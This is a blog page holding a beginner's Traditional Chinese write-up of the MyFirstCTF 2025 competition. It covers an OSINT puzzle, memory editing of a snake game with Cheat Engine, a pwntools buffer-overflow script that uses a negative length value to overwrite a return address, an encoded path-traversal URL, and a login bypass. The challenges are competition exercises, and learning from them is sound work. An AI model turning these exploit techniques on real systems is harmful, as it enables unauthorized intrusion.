

<!DOCTYPE html>
<html lang="zh-TW" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/Nineday.github.io/img/bg.gif">
  <link rel="icon" href="/Nineday.github.io/img/bg.gif">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Ninedey">
  <meta name="keywords" content="">
  
    <meta name="description" content="2025 My First CTF第一次參加，把有做出來的題目丟在這邊(雖然才3題)。 h2Last score miscWelcome簽到題，有防Ctrl+c的機制，所以我直接手打 Ramen CTF這題給了一張圖片，要求找到店家跟點的菜名(有人直接拿去對獎但我沒想到這招)這題我的解法是把賣家統編拿去財政部查，可是不知道為什麼查不到，最後是Chat GPT 查到的。 ReverseA_simpl">
<meta property="og:type" content="article">
<meta property="og:title" content="MyFirstCTF 2025">
<meta property="og:url" content="https://ninedey.github.io/Nineday.github.io/2025/09/11/%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0/index.html">
<meta property="og:site_name" content="Ninedey Blog">
<meta property="og:description" content="2025 My First CTF第一次參加，把有做出來的題目丟在這邊(雖然才3題)。 h2Last score miscWelcome簽到題，有防Ctrl+c的機制，所以我直接手打 Ramen CTF這題給了一張圖片，要求找到店家跟點的菜名(有人直接拿去對獎但我沒想到這招)這題我的解法是把賣家統編拿去財政部查，可是不知道為什麼查不到，最後是Chat GPT 查到的。 ReverseA_simpl">
<meta property="og:locale" content="zh_TW">
<meta property="og:image" content="https://hackmd.io/_uploads/HkllyvJzll.png">
<meta property="og:image" content="https://hackmd.io/_uploads/HkW79d1Gll.png">
<meta property="og:image" content="https://hackmd.io/_uploads/B1r3qukGxg.png">
<meta property="og:image" content="https://hackmd.io/_uploads/SkrdTwkfgl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/r1b3TPkzge.png">
<meta property="og:image" content="https://hackmd.io/_uploads/rJFNgd1zxe.png">
<meta property="og:image" content="https://hackmd.io/_uploads/ryJheuyfgg.png">
<meta property="og:image" content="https://hackmd.io/_uploads/ryL2M_1Geg.png">
<meta property="og:image" content="https://hackmd.io/_uploads/rJHJlznzgl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/ry9FgG2fll.png">
<meta property="og:image" content="https://hackmd.io/_uploads/rJ8d-G3zxg.png">
<meta property="og:image" content="https://hackmd.io/_uploads/SyZBnwVMxe.png">
<meta property="og:image" content="https://hackmd.io/_uploads/HkWtxRtfex.png">
<meta property="og:image" content="https://hackmd.io/_uploads/HyYueRFMee.png">
<meta property="article:published_time" content="2025-09-11T14:28:17.000Z">
<meta property="article:modified_time" content="2025-09-14T06:21:31.934Z">
<meta property="article:author" content="Ninedey">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://hackmd.io/_uploads/HkllyvJzll.png">
  
  
   
  <title>MyFirstCTF 2025 - Ninedey Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/Nineday.github.io/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/Nineday.github.io/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/Nineday.github.io/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/Nineday.github.io/css/_custom/custom.css">



 <link rel="stylesheet" href="/Nineday.github.io/css/custom.css">
  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"ninedey.github.io","root":"/Nineday.github.io/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/Nineday.github.io/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/Nineday.github.io/js/utils.js" ></script>
  <script  src="/Nineday.github.io/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/Nineday.github.io/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/Nineday.github.io/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首頁</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/Nineday.github.io/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>歸檔</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/Nineday.github.io/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分類</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/Nineday.github.io/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>標籤</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/Nineday.github.io/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>關於</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/Nineday.github.io/images/megumin.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="MyFirstCTF 2025"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-09-11 22:28" pubdate>
          2025年9月11日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          793 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          7 分鐘
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">MyFirstCTF 2025</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="2025-My-First-CTF"><a href="#2025-My-First-CTF" class="headerlink" title="2025 My First CTF"></a>2025 My First CTF</h1><p>第一次參加，把有做出來的題目丟在這邊(雖然才3題)。</p>
<h2 id="h2Last-score"><a href="#h2Last-score" class="headerlink" title="h2Last score"></a>h2Last score</h2><p><img src="https://hackmd.io/_uploads/HkllyvJzll.png" srcset="/Nineday.github.io/img/loading.gif" lazyload alt="image"></p>
<h2 id="misc"><a href="#misc" class="headerlink" title="misc"></a>misc</h2><h3 id="Welcome"><a href="#Welcome" class="headerlink" title="Welcome"></a>Welcome</h3><p><img src="https://hackmd.io/_uploads/HkW79d1Gll.png" srcset="/Nineday.github.io/img/loading.gif" lazyload alt="image"><br>簽到題，有防Ctrl+c的機制，<del>所以我直接手打</del></p>
<h3 id="Ramen-CTF"><a href="#Ramen-CTF" class="headerlink" title="Ramen CTF"></a>Ramen CTF</h3><p><img src="https://hackmd.io/_uploads/B1r3qukGxg.png" srcset="/Nineday.github.io/img/loading.gif" lazyload alt="image"><br>這題給了一張圖片，要求找到店家跟點的菜名(<del>有人直接拿去對獎但我沒想到這招</del>)<br>這題我的解法是把賣家統編拿去財政部查，可是不知道為什麼查不到，最後是Chat GPT 查到的。</p>
<h2 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h2><h3 id="A-simple-snake-game"><a href="#A-simple-snake-game" class="headerlink" title="A_simple_snake_game"></a>A_simple_snake_game</h3><p><img src="https://hackmd.io/_uploads/SkrdTwkfgl.png" srcset="/Nineday.github.io/img/loading.gif" lazyload alt="image"><br>這題給了你一個貪吃蛇小遊戲，要你贏得這遊戲(後面REVIEW了才發現連HP也要一起改)。<br>解題過程如下：</p>
<h3 id="解題過程"><a href="#解題過程" class="headerlink" title="解題過程"></a>解題過程</h3><p>打開檔案看到一個執行檔跟其他的應用檔案。<br><img src="https://hackmd.io/_uploads/r1b3TPkzge.png" srcset="/Nineday.github.io/img/loading.gif" lazyload alt="image"><br>執行後是一個遊戲，上下左右移動，吃掉方塊可以增加分數(<del>就很一般的貪吃蛇</del>)。<br>看到這邊就下意識地用Cheat Engine<br>但發現這隻笨蛇死掉時間我都來不及幫它加血量(<del>爛蛇</del>)<br>結果Enter可以暫停(這個是超出出題者範圍的操作)</p>
<hr>
<p>這題有兩個問題點：</p>
<blockquote>
<ol>
<li>HP要怎麼查</li>
<li>溢位</li>
</ol>
</blockquote>
<p>1.HP問題<br>因為沒有給CODE，這邊我猜測要用3去排除才能找到HP(前面試過2但都找不到)<br><img src="https://hackmd.io/_uploads/rJFNgd1zxe.png" srcset="/Nineday.github.io/img/loading.gif" lazyload alt="image"><br>接著再把笨蛇-1HP，再改2去搜尋。<br><img src="https://hackmd.io/_uploads/ryJheuyfgg.png" srcset="/Nineday.github.io/img/loading.gif" lazyload alt="image"><br>在移動時就會發現有一個變數在移動時會改變，這樣我們就找到HP了。</p>
<hr>
<p>2.Score 怎麼找<br>會找HP的話，Score也就差不多樣子(沒什麼特別的)<br>就一樣吃方塊去排除慢慢找就好。</p>
<hr>
<p>3.關於溢位<br>因為不知道通關的要求是多少(所以直接9999大法給他<del>弄到溢位就完事</del>)<br><code>補充:我在REVIEW時測試過當超過10位數時會溢位，</code></p>
<hr>
<p>最後把兩個弄到溢位，FLAG就出來了。(FLAG會出現在下方Score跟HP欄位)<br><img src="https://hackmd.io/_uploads/ryL2M_1Geg.png" srcset="/Nineday.github.io/img/loading.gif" lazyload alt="image"></p>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><p><img src="https://hackmd.io/_uploads/rJHJlznzgl.png" srcset="/Nineday.github.io/img/loading.gif" lazyload alt="image"><br>這題是一個我覺得蠻經典的BOF題型<br><img src="https://hackmd.io/_uploads/ry9FgG2fll.png" srcset="/Nineday.github.io/img/loading.gif" lazyload alt="image"><br>這邊會先判斷yes or no<br>接著再<code>int8 = read_int8();</code><br>從上面可以看到上限是143，但如果這邊輸入-1的話上限會變成255<br>接著再翻了一下Fuctions後看到這邊可以提SHELL，所以我們可以知道這題要ＢＯＦ接著就去算要多少能覆蓋就好。<br><img src="https://hackmd.io/_uploads/rJ8d-G3zxg.png" srcset="/Nineday.github.io/img/loading.gif" lazyload alt="image"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>r = remote(<span class="hljs-string">&#x27;chals1.ais3.org&#x27;</span>, <span class="hljs-number">60611</span>)<br>r.sendline(<span class="hljs-string">b&quot;yes&quot;</span>)<br>r.sendline(<span class="hljs-string">b&quot;-1&quot;</span>)<br>welcome_func = <span class="hljs-number">0x401256</span><br>payload = <span class="hljs-string">b&#x27;A&#x27;</span>*<span class="hljs-number">168</span>+p64(welcome_func)<br><br><span class="hljs-built_in">print</span>(r.sendlineafter(<span class="hljs-string">b&#x27;: &#x27;</span>,payload))<br>r.interactive()<br><br><br></code></pre></td></tr></table></figure>

<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="Tomorin-db-🐧"><a href="#Tomorin-db-🐧" class="headerlink" title="Tomorin db 🐧"></a>Tomorin db 🐧</h3><p><img src="https://hackmd.io/_uploads/SyZBnwVMxe.png" srcset="/Nineday.github.io/img/loading.gif" lazyload alt="image"><br>這題給了一個網站，題目敘述很誠實地說她把FLAG放在網站上。<br>(然後就有人以為是隱寫術一直在看圖片……)<br>這題按下FLAG的時候會被強制去聽MYGO。</p>
<blockquote>
<p>下面可以看到是怎麼做到的</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python">package main<br><br><span class="hljs-keyword">import</span> <span class="hljs-string">&quot;net/http&quot;</span><br><br>func main() &#123;<br>	http.Handle(<span class="hljs-string">&quot;/&quot;</span>, http.FileServer(http.Dir(<span class="hljs-string">&quot;/app/Tomorin&quot;</span>)))<br>	http.HandleFunc(<span class="hljs-string">&quot;/flag&quot;</span>, func(w http.ResponseWriter, r *http.Request) &#123;<br>		http.Redirect(w, r, <span class="hljs-string">&quot;https://youtu.be/lQuWN0biOBU?si=SijTXQCn9V3j4Rl6&quot;</span>, http.StatusFound)<br>  	&#125;)<br>  	http.ListenAndServe(<span class="hljs-string">&quot;:30000&quot;</span>, nil)<br>&#125;<br><br></code></pre></td></tr></table></figure>
<p>這題只要做Path Traversal就可以了。<br><a target="_blank" rel="noopener" href="http://chals1.ais3.org:30000/..%2F../flag">http://chals1.ais3.org:30000/..%2F../flag</a> &#x3D; <a target="_blank" rel="noopener" href="http://chals1.ais3.org:30000/flag">http://chals1.ais3.org:30000/flag</a><br><del>非常簡單</del>(到底誰以為是隱寫術)</p>
<h3 id="Login-Screen-1"><a href="#Login-Screen-1" class="headerlink" title="Login Screen 1"></a>Login Screen 1</h3><p><img src="https://hackmd.io/_uploads/HkWtxRtfex.png" srcset="/Nineday.github.io/img/loading.gif" lazyload alt="image"><br>這題要你去做admin登入<br>解題過程：<br>先做一次guest的登入之後用SQLite把二次驗證碼抓出來後再登入FLAG就出來了。<br><img src="https://hackmd.io/_uploads/HyYueRFMee.png" srcset="/Nineday.github.io/img/loading.gif" lazyload alt="image"></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>MyFirstCTF 2025</div>
      <div>https://ninedey.github.io/Nineday.github.io/2025/09/11/我的第一篇文章/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Ninedey</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>發布於</div>
          <div>2025年9月11日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>許可協議</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/Nineday.github.io/2025/09/14/post-title/" title="CRYPTOHACK Writeup">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">CRYPTOHACK Writeup</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/Nineday.github.io/2025/09/11/hello-world/" title="Hello World">
                        <span class="hidden-mobile">Hello World</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目錄</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜尋</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">關鍵字</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/Nineday.github.io/js/events.js" ></script>
<script  src="/Nineday.github.io/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/Nineday.github.io/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/Nineday.github.io/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/Nineday.github.io/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允許 JavaScript 運行的環境下瀏覽效果更佳</div>
  </noscript>
</body>
</html>
